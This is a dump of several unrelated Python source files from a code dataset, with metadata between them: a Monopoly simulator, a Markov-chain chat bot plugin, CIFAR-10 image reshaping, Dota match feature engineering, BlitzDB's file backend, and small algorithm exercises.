self.double_on_go:\n self.exchange_money(amount=200, giver=self.bank, receiver=player,\n summary=\"Got extra $200 for landing on Go.\")\n\n elif board_space.name == \"Income Tax\":\n # The player pays $200. The '10% of all assets' option was removed in 2008.\n self.exchange_money(amount=200, giver=player, receiver=self.free_parking, summary=\"Income Tax.\")\n\n elif board_space.name == \"Free Parking\":\n if self.free_parking_pool: # Check to see if the Free Parking pool is enabled.\n # The player takes the money in Free Parking.\n self.exchange_money(amount=self.free_parking.money, giver=self.free_parking, receiver=player,\n summary=\"Received Free Parking pool.\")\n\n elif board_space.name == \"Chance\":\n self.chance(player) # Draw card and make action.\n\n elif board_space.name == \"Community Chest\":\n self.community_chest(player) # Draw card and make action.\n\n elif board_space.name == \"Go to Jail\":\n self.go_to_jail(player) # The player goes to jail.\n\n elif board_space.name == \"Luxury Tax\":\n # The player pays a $100 tax.\n self.exchange_money(amount=100, giver=player, receiver=self.free_parking, summary=\"Luxury Tax.\")\n\n else: # The player landed on a property.\n self.property_action(player, board_space)\n\n # Reset this variable.\n player.card_rent = False\n\n # An individual player takes a turn.\n def take_turn(self, player):\n self.turn_counter += 1 # Increase master turn counter\n self.doubles_counter = 0 # Reset doubles counter.\n\n # Track the player's money.\n # player.money_changes.append(player.money)\n\n # Is the player in jail?\n if player.in_jail: # Player is in jail.\n player.jail_counter += 1 # Increase the jail turn counter\n if player.jail_decision(self):\n player.jail_counter = 0 # Reset the jail counter.\n player.pay_out_of_jail(game_info=self) # Pay out using a card or $50.\n else:\n # Roll the dice.\n die1 = self.get_roll()\n die2 = self.get_roll()\n self.dice_roll = die1 + die2\n\n # Check for snake eyes.\n if self.snake_eyes_bonus and die1 == 1 == die2:\n self.exchange_money(amount=500, giver=self.bank, receiver=player, summary=\"Snake eyes bonus.\")\n\n # Make an action.\n if die1 == die2: # The player rolled doubles.\n player.jail_counter = 0 # Reset the jail counter.\n self.move_again = True # The player can move out of jail\n elif die1 != die2 and player.jail_counter == 3:\n player.jail_counter = 0 # Reset the jail counter.\n player.pay_out_of_jail(game_info=self) # Pay out using a card or $50.\n else: # The player didn't roll doubles.\n return # The player can not move around the board.\n\n if player.money > 0: # If the player did not go broke coming out of jail!\n self.move_again = True # Initial condition.\n\n # The main loop.\n while self.move_again:\n self.move_again = False\n\n # Roll the dice.\n die1 = self.get_roll()\n die2 = self.get_roll()\n self.dice_roll = die1 + die2\n\n # Check for snakes eyes.\n if self.snake_eyes_bonus and die1 == 1 == die2:\n self.exchange_money(amount=500, giver=self.bank, receiver=player, summary=\"Snake eyes bonus.\")\n\n # Check for doubles.\n if player.in_jail:\n player.in_jail = False # The player is no longer in jail, but can not move again regardless.\n elif die1 == die2:\n self.doubles_counter += 1 # Increase the doubles counter.\n if self.doubles_counter == 3: # The players is speeding.\n self.go_to_jail(player)\n return # The function ends.\n self.move_again = True # The player can move again.\n\n self.move_ahead(player, self.dice_roll) # Move the player\n board_space = self.board[player.position] # Find the current board space.\n self.board_action(player, board_space) # Make an action based on the current board space.\n\n # If a card or board space brought the player to jail, end the function.\n if player.in_jail:\n return\n\n\n # Plays a game object.\n def play(self):\n # Shuffle the players.\n shuffle(self.active_players)\n\n # Initial condition.\n current_player_index = 0\n\n # Store starting player for reference.\n self.starting_player = self.active_players[0].number\n\n # Game loop. Continue if there is more than 1 player and we haven't reached the cutoff.\n while len(self.active_players) > 1 and self.turn_counter < self.cutoff:\n # pass###print([self.active_players[0].money,self.active_players[1].money])\n\n # Create list of players starting with the player who is going.\n self.development_order = []\n self.development_order.extend(self.active_players[current_player_index - 1:])\n self.development_order.extend(self.active_players[:current_player_index - 1])\n\n # Allow the player to develop and un-mortgage properties.\n for player in self.development_order:\n player.between_turns(game_info=self)\n\n # Current player takes turn.\n self.take_turn(self.active_players[current_player_index])\n\n # Update current_player_index.\n current_player_index = (current_player_index + 1) % len(self.active_players)\n\n # # # The game has ended # # #\n\n # Find all monopolies.\n all_monopolies = []\n for player in self.active_players:\n all_monopolies.extend(player.monopolies)\n for player in self.inactive_players:\n all_monopolies.extend(player.monopolies)\n\n # Identify the winner.\n if len(self.active_players) == 1:\n self.winner = self.active_players[0].number\n else: # It was tie.\n self.winner = 0\n self.loss_reason = \"Tie\"\n\n # Ending report.\n results = {'winner': self.winner,\n 'length': self.turn_counter,\n 'end behavior': self.loss_reason,\n 'monopolies': all_monopolies,\n 'started': self.starting_player,\n 'players': self.active_players\n }\n return results\n","sub_path":"python_archive/monopoly_trading_archive.py","file_name":"monopoly_trading_archive.py","file_ext":"py","file_size_in_byte":88614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"213212732","text":"# Markov plugin\n# Commands:\n# - /markov\n# Monitors:\n# - markov_monitor\n# Configuration:\n# command.markov:\n# folder: \"markov data folder\"\n\nimport os\nimport json\nimport markovify\nfrom .basic import CommandBase, CommandInfo, CommandType, bot_command\n\nclass Markov(CommandBase):\n name = \"Markov\"\n safename = \"markov\"\n datfolder = \"\"\n users = dict()\n def __init__(self, logger):\n super().__init__(logger)\n self.to_register = [\n CommandInfo(\"markov\", self.execute_generate, \"Emulate yourself talking.\"),\n CommandInfo(\"markov_monitor\", self.monitor_modeling, \"Model users.\", _type=CommandType.Monitor)\n ]\n def get_help_msg(self, cmd):\n return \"Call /markov to have the Markov model generate text that sounds like you.\"\n def load_config(self, confdict):\n self.datfolder = confdict['folder']\n if os.path.exists(self.datfolder):\n for file in os.listdir(self.datfolder):\n with open(os.path.join(self.datfolder, file), 'r', newline='\\n') as f:\n udata = f.read()\n user = file.split('.json')[0]\n ujson = json.loads(udata)\n data = markovify.Text.from_dict(ujson)\n self.users[user] = data\n def on_exit(self):\n self.logger.info(\" Saving collected Markov data..\")\n if not os.path.exists(self.datfolder):\n os.makedirs(self.datfolder)\n for user in self.users:\n udata = self.users[user].to_json()\n with open(os.path.join(self.datfolder, '{}.json'.format(user)), 'w', newline='\\n') as f:\n f.write(udata)\n self.logger.info(\" Done saving.\")\n @bot_command\n def execute_generate(self, bot, update, args):\n user = 'markov_model'\n if user in self.users:\n out = None\n while out == None:\n out = self.users[user].make_sentence()\n bot.send_message(chat_id = update.message.chat_id,\n text = out,\n disable_notification = True)\n else:\n bot.send_message(chat_id = update.message.chat_id,\n text = \"I currently have no data from you, try later.\",\n disable_notification = True)\n def monitor_modeling(self, bot, update):\n try:\n user = 'markov_model'\n intext = update.message.text\n if intext[-1] not in '.!?':\n intext += '.'\n new = markovify.Text(intext, state_size = 3)\n self.logger.info(\" Adding to a Markov model..\")\n if user not in self.users:\n self.users[user] = new\n else:\n self.users[user] = markovify.combine(models=[self.users[user], new])\n self.logger.info(\" Adding done.\")\n self.logger.info(\"markov_monitor processing completed successfully.\")\n except Exception as e:\n self.logger.error(e)\n","sub_path":"commands/markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"595104923","text":"import numpy as np\n# Width and height of each image.\nimg_size = 32\n\n# Number of channels in each image, 3 channels: Red, Green, Blue.\nnum_channels = 3\n\n# Length of an image when flattened to a 1-dim array.\nimg_size_flat = img_size * img_size * num_channels\n\n# Number of classes.\nnum_classes = 10\n\ndef _convert_images(raw):\n \"\"\"\n Convert images from the CIFAR-10 format and\n return a 4-dim array with shape: [image_number, height, width, channel]\n where the pixels are floats between 0.0 and 1.0.\n \"\"\"\n\n # Convert the raw images from the data-files to floating-points.\n # raw_float = np.array(raw, dtype=float) / 255.0\n raw_float = raw\n # Reshape the array to 4-dimensions.\n images_raw = raw_float.reshape([-1, num_channels, img_size, img_size])\n\n # Reorder the indices of the array.\n images = images_raw.transpose([0, 2, 3, 1])\n\n return images,images_raw","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"537227652","text":"import numpy as np\nimport pandas as pd\nimport sklearn\nimport sklearn.preprocessing\n\n\ndef drop_features(data):\n columns = [\"r1_hero\", \"r2_hero\", \"r3_hero\", \"r4_hero\", \"r5_hero\",\n \"d1_hero\", \"d2_hero\", \"d3_hero\", \"d4_hero\", \"d5_hero\",\n \"lobby_type\",\n \"radiant_24_count\", \"radiant_30_count\",\n \"radiant_32_count\", \"radiant_33_count\", \"radiant_35_count\", \"radiant_37_count\",\n \"dire_24_count\", \"dire_30_count\",\n \"dire_32_count\", \"dire_33_count\", \"dire_35_count\", \"dire_37_count\",\n \"bans\",\n ]\n data.drop(columns, axis=1, inplace=True)\n return data\n\n\ndef add_diff_teams(data):\n for feature_name in [\"level\", \"xp\", \"gold\", \"lh\", \"kills\", \"deaths\", \"items\"]:\n for func in [\"max\", \"min\", \"mean\", \"median\"]:\n data[\"diff_\" + feature_name + \"_\" + func] = data[\"r_\" + feature_name + \"_\" + func] - \\\n data[\"d_\" + feature_name + \"_\" + func]\n return data\n\n\n\ndef add_features(data):\n data = sort_players(data)\n\n data = add_missing_indicator(data)\n data = add_team_statistics(data)\n data = add_diff_teams(data)\n data = add_lobby_type(data)\n\n return data\n\n\ndef add_lobby_type(data):\n data[\"lobby_type_0\"] = data[\"lobby_type\"] == 0\n data[\"lobby_type_1\"] = data[\"lobby_type\"] == 1\n data[\"lobby_type_7\"] = data[\"lobby_type\"] == 7\n\n return data\n\n\ndef add_missing_indicator(data):\n columns = ['first_blood_time', 'first_blood_player2',\n 'radiant_bottle_time','radiant_courier_time', 'radiant_flying_courier_time',\n 'radiant_first_ward_time',\n 'dire_bottle_time', 'dire_courier_time', 'dire_flying_courier_time',\n 'dire_first_ward_time']\n\n for column in columns:\n data[\"isnan\" + column] = np.isnan(data[column])\n\n\n return data\n\n\ndef add_team_statistics(data):\n for team in [\"d\", \"r\"]:\n for feature_name in [\"level\", \"xp\", \"gold\", \"lh\", \"kills\", \"deaths\", \"items\"]:\n columns = []\n for player in [\"1\", \"2\", \"3\", \"4\", \"5\"]:\n columns += [team + player + \"_\" + feature_name]\n\n data[team+\"_\"+feature_name+\"_max\"] = np.max(data[columns], axis=1)\n data[team+\"_\"+feature_name+\"_min\"] = np.min(data[columns], axis=1)\n data[team+\"_\"+feature_name+\"_mean\"] = np.mean(data[columns], axis=1)\n data[team+\"_\"+feature_name+\"_mean^3\"] = np.mean(data[columns], axis=1) ** 3\n data[team+\"_\"+feature_name+\"_median\"] = np.median(data[columns], axis=1)\n\n return data\n\n\ndef sort_players(data):\n sort_feature = \"lh\"\n\n for team in [\"d\", \"r\"]:\n sort_by_columns = []\n for player in [\"1\", \"2\", \"3\", \"4\", \"5\"]:\n sort_by_columns += [team + player + \"_\" + sort_feature]\n vals = data[sort_by_columns].values\n sort_idx = list(np.ogrid[[slice(x) for x in vals.shape]])\n sort_idx[1] = vals.argsort(axis=1)\n\n for feature_name in [\"level\", \"xp\", \"gold\", \"lh\", \"kills\", \"deaths\", \"items\"]:\n columns = []\n for player in [\"1\", \"2\", \"3\", \"4\", \"5\"]:\n columns += [team + player + \"_\" + feature_name]\n\n data[columns] = data[columns].values[sort_idx]\n\n\n return data\n\n\n\n\ndef input_missing(train, test):\n\n imp = sklearn.preprocessing.Imputer()\n train = imp.fit_transform(train)\n test = imp.transform(test)\n\n return train, test\n\n\ndef scale_data(train, test):\n scaler = sklearn.preprocessing.StandardScaler()\n train = scaler.fit_transform(train)\n test = scaler.transform(test)\n\n return train, test\n\n\ndef shuffle_train(train, target):\n idx = np.arange(len(train))\n np.random.seed(1234)\n np.random.shuffle(idx)\n train = train.iloc[idx]\n target = target[idx]\n\n return train, target\n\n\ndef get_picks(data):\n N_heroes = 113\n X_pick = np.zeros((data.shape[0], N_heroes))\n\n for i, match_id in enumerate(data.index):\n for p in range(5):\n X_pick[i, data.ix[match_id, 'r%d_hero' % (p+1)]-1] = 1\n X_pick[i, data.ix[match_id, 'd%d_hero' % (p+1)]-1] = -1\n\n return X_pick\n\n\ndef add_hero_pairs(train, test, picks_train, picks_test, target):\n N_heroes = 113\n for i in range(N_heroes):\n for j in range(i+1, N_heroes):\n slide = target[np.logical_or(np.logical_and(picks_train[:, i] == 1, picks_train[:, j] == -1),\n np.logical_and(picks_train[:, i] == -1, picks_train[:, j] == 1))]\n if len(slide) > 3000:\n train_feature = np.logical_and(picks_train[:, i] == 1, picks_train[:, j] == -1).astype(np.float) - \\\n np.logical_and(picks_train[:, i] == -1, picks_train[:, j] == 1).astype(np.float)\n test_feature = np.logical_and(picks_test[:, i] == 1, picks_test[:, j] == -1).astype(np.float) - \\\n np.logical_and(picks_test[:, i] == -1, picks_test[:, j] == 1).astype(np.float)\n train[\"d_heroes_\"+str(i) + \"_\" + str(j)] = train_feature\n test[\"d_heroes_\"+str(i) + \"_\" + str(j)] = test_feature\n\n\n return train, test\n\n\ndef calc_rating(data, target):\n N = 113 # heroes\n\n # calculate each hero-pair synergy and antisynergy\n synergy = np.zeros((N,N)) # sum of wins in matches played together\n antisynergy = np.zeros((N,N)) # sum of wins when played against\n matchcounts = np.zeros((N,N)) # count of matches played together\n matchcounta = np.zeros((N,N)) # count of matches played against\n\n for match_counter, match_id in enumerate(data.index):\n #synergy when both heroes in win team\n winteam = 'r' if target[match_counter] == 1 else 'd'\n looseteam = 'd' if winteam =='r' else 'r'\n pind = [0] *5 #player indexes\n antipind = [0] *5 # looser indicies\n # get indexes of players in each tem\n for i in range(5):\n pind[i] = data.ix[match_id, winteam+'%d_hero'%(i+1)]-1\n for i in range(5):\n antipind[i] = data.ix[match_id, looseteam+'%d_hero'%(i+1)]-1\n # accumulate synergy of pairs\n for i in range(5):\n for j in range(i+1,5):\n synergy[pind[i], pind[j]] +=1\n synergy[pind[j], pind[i]] +=1\n # accumulate match counter for playing together\n for i in range(5):\n for j in range(5):\n matchcounts[pind[i], pind[j]] +=1 #together and win\n matchcounts[antipind[i], antipind[j]] +=1 # together and loose\n\n #antisynergy when hero i in winteam while hero j in loose team\n for i in range(5):\n for j in range(5):\n antisynergy[pind[i], antipind[j]] +=1\n matchcounta[pind[i], antipind[j]] +=1\n matchcounta[antipind[j], pind[i]] +=1\n\n # normalize\n synergyrate = np.zeros((N,N))\n antisynergyrate = np.zeros((N,N))\n for i in range(N):\n for j in range(N):\n if matchcounts[i,j] !=0:\n synergyrate[i,j] = synergy[i,j]/matchcounts[i,j]\n else:\n synergyrate[i,j] = 0.5\n if matchcounta[i,j] !=0:\n antisynergyrate[i,j] = antisynergy[i,j]/ matchcounta[i,j]\n else:\n antisynergyrate[i,j] = 0.5\n\n return synergyrate, antisynergyrate\n\n\ndef add_hero_synergy_part(data, synergyrate, antisynergyrate):\n syn1 = np.zeros(len(data))\n syn2 = np.zeros(len(data))\n syn3 = np.zeros(len(data))\n antisyn1 = np.zeros(len(data))\n antisyn2 = np.zeros(len(data))\n antisyn3 = np.zeros(len(data))\n\n for player1 in range(1, 6):\n for player2 in range(player1+1, 6):\n syn1 += synergyrate[data[\"r\" + str(player1) + \"_hero\"]-1, data[\"r\" + str(player2) + \"_hero\"]-1]\n syn2 += synergyrate[data[\"d\" + str(player1) + \"_hero\"]-1, data[\"d\" + str(player2) + \"_hero\"]-1]\n syn3 = syn1 - syn2\n\n for player1 in range(1, 6):\n for player2 in range(1, 6):\n antisyn1 += antisynergyrate[data[\"r\" + str(player1) + \"_hero\"]-1, data[\"d\" + str(player2) + \"_hero\"]-1]\n antisyn2 += antisynergyrate[data[\"d\" + str(player1) + \"_hero\"]-1, data[\"r\" + str(player2) + \"_hero\"]-1]\n antisyn3 = antisyn1 - antisyn2\n\n return syn1, syn2, syn3, antisyn1, antisyn2, antisyn3\n\n\ndef add_hero_synergy(train, test, target):\n N = 10\n syn_antisyn_train = np.zeros((6, len(train)))\n syn_antisyn_test = np.zeros((6, len(test)))\n temp_syn_antisyn = np.empty_like(syn_antisyn_test)\n\n cv = sklearn.cross_validation.KFold(len(train), n_folds=N, shuffle=True, random_state=1234)\n for train_index, test_index in cv:\n synergyrate, antisynergyrate = calc_rating(train.iloc[train_index, :], target[train_index])\n syn_antisyn_train[0][test_index], syn_antisyn_train[1][test_index], syn_antisyn_train[2][test_index], \\\n syn_antisyn_train[3][test_index], syn_antisyn_train[4][test_index], syn_antisyn_train[5][test_index] = add_hero_synergy_part(train.iloc[test_index, :], synergyrate, antisynergyrate)\n temp_syn_antisyn = np.array(add_hero_synergy_part(test, synergyrate, antisynergyrate))\n syn_antisyn_test += temp_syn_antisyn/N\n\n train[\"synergy1\"] = syn_antisyn_train[0]\n train[\"synergy2\"] = syn_antisyn_train[1]\n train[\"synergy3\"] = syn_antisyn_train[2]\n train[\"antisynergy1\"] = syn_antisyn_train[3]\n train[\"antisynergy2\"] = syn_antisyn_train[4]\n train[\"antisynergy3\"] = syn_antisyn_train[5]\n\n test[\"synergy1\"] = syn_antisyn_test[0]\n test[\"synergy2\"] = syn_antisyn_test[1]\n test[\"synergy3\"] = syn_antisyn_test[2]\n test[\"antisynergy1\"] = syn_antisyn_test[3]\n test[\"antisynergy2\"] = syn_antisyn_test[4]\n test[\"antisynergy3\"] = syn_antisyn_test[5]\n\n return train, test\n\n\ndef preprocess_data(train, test, target):\n train, target = shuffle_train(train, target)\n\n train_picks, test_picks = get_picks(train), get_picks(test)\n train, test = add_hero_pairs(train, test, train_picks, test_picks, target)\n train, test = add_hero_synergy(train, test, target)\n\n train = add_features(train)\n test = add_features(test)\n\n train = drop_features(train)\n test = drop_features(test)\n\n train, test = input_missing(train, test)\n\n train = np.column_stack((train, train_picks))\n test = np.column_stack((test, test_picks))\n\n train, test = scale_data(train, test)\n\n return train, test, target","sub_path":"contests/CMC Spring 1/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":10460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"243805402","text":"def solution(A):\n N = len(A)\n \n # Remove two elements of array with different values until\n # all elements in array have same value\n size = 0\n for i in range(N):\n if size == 0:\n value = A[i]\n size = 1\n else:\n if value == A[i]:\n size += 1\n else:\n size -= 1\n\t\n\t# Check that the remaining value is indeed a dominator\n\t\n candidate = -1\n if size > 0:\n candidate = value\n\t\n count = 0\n for i in range(N):\n if A[i] == candidate:\n count += 1\n\t\n if count > N/2:\n i = 0\n while A[i] != candidate:\n i += 1\n return i\n else:\n return -1\n\n\n","sub_path":"Dominator.py","file_name":"Dominator.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"641274010","text":"from blitzdb.backends.file.queryset import QuerySet\nfrom blitzdb.backends.file.store import TransactionalCompressedStore,TransactionalStore,Store\nfrom blitzdb.backends.file.index import TransactionalIndex,Index\nfrom blitzdb.backends.base import Backend as BaseBackend,NotInTransaction,DatabaseIndexError\nfrom blitzdb.backends.file.serializers import PickleSerializer as Serializer\n\nimport os\nimport os.path\n\nimport hashlib\nimport datetime\nimport uuid\nimport copy\n\nfrom collections import defaultdict\n\nclass Backend(BaseBackend):\n\n \"\"\"\n The file backend that stores and retrieves DB objects in files.\n \"\"\"\n\n class Meta(object):\n supports_indexes = True\n supports_transactions = True\n\n #The default store & index classes that the backend uses\n CollectionStore = TransactionalStore\n Index = TransactionalIndex\n IndexStore = Store\n\n def __init__(self,path,autocommit = False,**kwargs):\n\n self._path = os.path.abspath(path)\n if not os.path.exists(path):\n os.makedirs(path)\n\n self.collections = {}\n self.stores = {}\n self.autocommit = autocommit\n self.indexes = defaultdict(lambda : {})\n self.index_stores = defaultdict(lambda : {})\n self.load_config()\n\n super(Backend,self).__init__(**kwargs)\n\n self.in_transaction = False\n self.begin()\n\n def load_config(self):\n config_file = self._path+\"/config.json\"\n if os.path.exists(config_file):\n with open(config_file,\"rb\") as config_file:\n self._config = Serializer.deserialize(config_file.read())\n else:\n self._config = {\n 'indexes' : {}\n }\n self.save_config()\n\n def save_config(self):\n config_file = self._path+\"/config.json\"\n with open(config_file,\"wb\") as config_file:\n config_file.write(Serializer.serialize(self._config))\n \n @property\n def path(self):\n return self._path\n\n def get_collection_store(self,collection):\n if not collection in self.stores:\n self.stores[collection] = self.CollectionStore({'path':self.path+\"/\"+collection+\"/objects\"})\n return self.stores[collection]\n\n def get_index_store(self,collection,store_key):\n if not store_key in self.index_stores[collection]:\n self.index_stores[collection][store_key] = self.IndexStore({'path':self.path+\"/\"+collection+\"/indexes/\"+store_key})\n return self.index_stores[collection][store_key]\n\n def register(self,cls,parameters = None):\n super(Backend,self).register(cls,parameters)\n self.init_indexes(self.get_collection_for_cls(cls))\n\n def begin(self):\n \"\"\"\n Starts a new transaction\n \"\"\"\n if self.in_transaction:#we're already in a transaction...\n self.commit()\n self.in_transaction = True\n for collection,store in self.stores.items():\n store.begin()\n indexes = self.indexes[collection]\n for index in indexes.values():\n index.begin()\n\n def rollback(self):\n \"\"\"\n Rolls back a transaction\n \"\"\"\n if not self.in_transaction:\n raise NotInTransaction\n for collection,store in self.stores.items():\n store.rollback()\n indexes = self.indexes[collection]\n for index in indexes.values():\n index.rollback()\n self.in_transaction = False\n\n def commit(self):\n \"\"\"\n Commits a transaction\n \"\"\"\n for collection in self.collections:\n store = self.get_collection_store(collection)\n store.commit()\n indexes = self.get_collection_indexes(collection)\n for index in indexes.values():\n index.commit()\n self.in_transaction = False\n self.begin()\n\n def init_indexes(self,collection):\n if collection in self._config['indexes']:\n #If not pk index is present, we create one on the fly...\n if not [idx for idx in self._config['indexes'][collection].values() if idx['key'] == self.primary_key_name]:\n self.create_index(collection,{'key':self.primary_key_name})\n \n #We sort the indexes such that pk is always created first...\n for index_params in sorted(self._config['indexes'][collection].values(),key = lambda x: 0 if x['key'] == self.primary_key_name else 1):\n index = self.create_index(collection,index_params)\n else:\n #If no indexes are given, we just create a primary key index...\n self.create_index(collection,{'key':self.primary_key_name})\n\n \n def rebuild_index(self,collection,key):\n index = self.indexes[collection][key]\n all_objects = self.filter(collection,{})\n for obj in all_objects:\n serialized_attributes = self.serialize(obj.attributes)#optimize this!\n index.add_key(serialized_attributes,obj._store_key)\n if self.autocommit:\n self.commit()\n\n def create_index(self,cls_or_collection,params):\n if not isinstance(params,dict):\n params = {'key' : params}\n if not isinstance(cls_or_collection,str) and not isinstance(cls_or_collection,unicode):\n collection = self.get_collection_for_cls(cls_or_collection)\n else:\n collection = cls_or_collection\n if params['key'] in self.indexes[collection]:\n return #Index already exists\n if not 'id' in params:\n params['id'] = uuid.uuid4().hex \n\n index_store = self.get_index_store(collection,params['id'])\n index = self.Index(params,index_store)\n self.indexes[collection][params['key']] = index\n\n if not collection in self._config['indexes']:\n self._config['indexes'][collection] = {}\n\n self._config['indexes'][collection][params['key']] = params\n self.save_config()\n\n if not index.loaded:#If the index failed to load, we rebuild it...\n self.rebuild_index(collection,index.key)\n\n return index\n\n def get_collection_indexes(self,collection):\n return self.indexes[collection] if collection in self.indexes else {}\n\n def encode_attributes(self,attributes):\n return Serializer.serialize(attributes)\n\n def decode_attributes(self,data):\n return Serializer.deserialize(data)\n\n def get_object(self,cls,key):\n collection = self.get_collection_for_cls(cls)\n store = self.get_collection_store(collection)\n try:\n data = self.deserialize(self.decode_attributes(store.get_blob(key)))\n except IOError:\n raise cls.DoesNotExist\n obj = self.create_instance(cls,data)\n return obj\n\n def save(self,obj):\n collection = self.get_collection_for_obj(obj)\n indexes = self.get_collection_indexes(collection)\n store = self.get_collection_store(collection)\n\n if obj.pk == None:\n obj.pk = uuid.uuid4().hex \n\n serialized_attributes = self.serialize(obj.attributes)\n data = self.encode_attributes(serialized_attributes)\n \n try:\n store_key = self.get_pk_index(collection).get_keys_for(obj.pk).pop()\n except IndexError:\n store_key = uuid.uuid4().hex\n \n store.store_blob(data,store_key)\n\n for key,index in indexes.items():\n index.add_key(serialized_attributes,store_key)\n\n if self.autocommit:\n self.commit()\n\n return obj\n\n def get_pk_index(self,collection):\n return self.indexes[collection][self.primary_key_name]\n\n def delete(self,obj):\n \n collection = self.get_collection_for_obj(obj)\n store = self.get_collection_store(collection)\n indexes = self.get_collection_indexes(collection)\n \n store_keys = self.get_pk_index(collection).get_keys_for(obj.pk)\n \n for store_key in store_keys:\n try:\n store.delete_blob(store_key)\n except IOError:\n pass\n for index in indexes.values():\n index.remove_key(store_key)\n\n if self.autocommit:\n self.commit()\n\n def get(self,cls,query):\n objects = self.filter(cls,query,limit = 1)\n if len(objects) == 0:\n raise cls.DoesNotExist\n elif len(objects) > 1:\n return cls.MultipleDocumentsReturned\n return objects[0]\n\n def compile_query(self,query_dict):\n\n def access_path(d,path):\n v = d\n for elem in path:\n if isinstance(v,list):\n v = v[int(elem)]\n else:\n v = v[elem]\n return v\n\n serialized_query_dict = self.serialize(query_dict)\n\n compiled_query = []\n for key,value in serialized_query_dict.items():\n splitted_key = key.split(\".\")\n accessor = lambda d,path = splitted_key : access_path(d,path = path)\n compiled_query.append((key,accessor,value))\n return compiled_query\n \n def filter(self,cls_or_collection,query,sort_by = None,limit = None,offset = None,initial_keys = None):\n\n if not isinstance(query,dict):\n raise AttributeError(\"Query parameters must be dict!\")\n\n if not isinstance(cls_or_collection,str) and not isinstance(cls_or_collection,unicode):\n collection = self.get_collection_for_cls(cls_or_collection)\n cls = cls_or_collection\n else:\n collection = cls_or_collection\n cls = self.get_cls_for_collection(collection)\n\n store = self.get_collection_store(collection)\n indexes = self.get_collection_indexes(collection)\n compiled_query = self.compile_query(query)\n\n unindexed_queries = []\n indexed_queries = []\n\n indexes_by_key = dict([(idx.key,idx) for idx in indexes.values()])\n\n for key,accessor,value in compiled_query:\n if key in indexes_by_key:\n indexed_queries.append([indexes_by_key[key],value])\n else:\n unindexed_queries.append([accessor,value])\n\n if indexed_queries:\n keys = None\n if initial_keys:\n keys = copy.copy(initial_keys)\n for index,value in indexed_queries:\n if not keys:\n keys = index.get_keys_for(value)\n else:\n keys = [key for key in keys if key in index.get_keys_for(value)]\n elif initial_keys:\n keys = copy.copy(initial_keys)\n else:\n #We fetch ALL keys from the primary index.\n keys = self.get_pk_index(collection).get_all_keys()\n\n for accessor,value in unindexed_queries:\n keys_to_remove = []\n for key in keys:\n try:\n attributes = self.decode_attributes(store.get_blob(key))\n except IOError:\n raise DatabaseIndexError\n try:\n if callable(value):\n if not value(accessor(attributes)):\n if not key in keys_to_remove:\n keys_to_remove.append(key)\n else:\n accessed_value = accessor(attributes)\n if isinstance(accessed_value,list):\n if value not in accessed_value: \n if not key in keys_to_remove:\n keys_to_remove.append(key)\n elif accessed_value != value:\n if not key in keys_to_remove:\n keys_to_remove.append(key) \n except (KeyError,IndexError):\n if not key in keys_to_remove:\n keys_to_remove.append(key)\n keys = [key for key in keys if not key in keys_to_remove]\n\n return QuerySet(self,cls,store,keys)\n\n","sub_path":"blitzdb/backends/file/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":12076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"172736854","text":"# coding: utf-8\n__author__ = \"shiyue\"\n\"\"\"\nGiven a linked list, remove the nth node from the end of list and return its head.\n\nFor example,\n\n Given linked list: 1->2->3->4->5, and n = 2.\n\n After removing the second node from the end, the linked list becomes 1->2->3->5.\nNote:\nGiven n will always be valid.\nTry to do this in one pass.\n\nSubscribe to see which companies asked this question\n\"\"\"\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n if not head: return head\n p, q, pre = head, head, -1\n for i in range(n):\n p = p.next\n while p:\n p = p.next\n pre = q\n q = q.next\n if pre != -1:\n pre.next = pre.next.next\n else:\n head = head.next\n return head\n","sub_path":"easy/Remove Nth Node From End of List.py","file_name":"Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"377757615","text":"import torch\nfrom torch.utils.data import DataLoader\n\nfrom human36m import HM36Dataset\n\nfrom DGPT.Utils.CUDAFuncs.GaussianBlur import GaussianBlur_CUDA\n\nimport time\nimport numpy as np\nimport cv2\n\ndef CamProj(x, y, z, fx, fy, u, v, k=1.0):\n cam_x = x / z * fx\n cam_x = cam_x / k + u\n cam_y = y / z * fy\n cam_y = cam_y / k + v\n return cam_x, cam_y\n\nBODY_CONN_COLOR = (\n # pelvis r_hip r_knee r_ank L_hip L_knee L_ank Spine\n [0, 255, 0], [255, 0, 255], [0, 0, 255], [0, 255, 255], [255, 255, 255], [0, 128, 255], [204, 204, 255], [255, 102, 255],\n # neck Head Site L_shoulder L_elbow L_wrist R_shoulder R_elbow\n [255, 0, 0], [0, 255, 0], [255, 255, 255], [255, 0, 0], [0, 255, 0], [255, 255, 255], [255, 0, 0], [0, 255, 0],\n # R_wrist\n [255, 255, 255]\n)\n\nBODY_PARTS_KPT_IDS = [[8, 1],\n [1, 2],\n [2, 3],\n [8, 4],\n [4, 5],\n [5, 6],\n [8, 14],\n [14, 15],\n [15, 16],\n [8, 11],\n [11, 12],\n [12, 13],\n [8, 9],\n [9, 10],\n [8, 7],\n [7, 0],\n ]\nBODY_PARTS_PAF_IDS = ([0, 1], [2, 3], [4, 5],\n [6, 7], [8, 9], [10, 11], [12, 13], [14, 15], [16, 17], [18, 19],\n [20, 21], [22, 23], [24, 25], [26, 27], [28, 29], [30, 31])\n\nif __name__ == '__main__':\n st = time.time()\n\n batch = 1\n dataset = HM36Dataset(\"d:/datasets/human3.6m\", 8, 7, 1, [1], paf_ver=2)\n 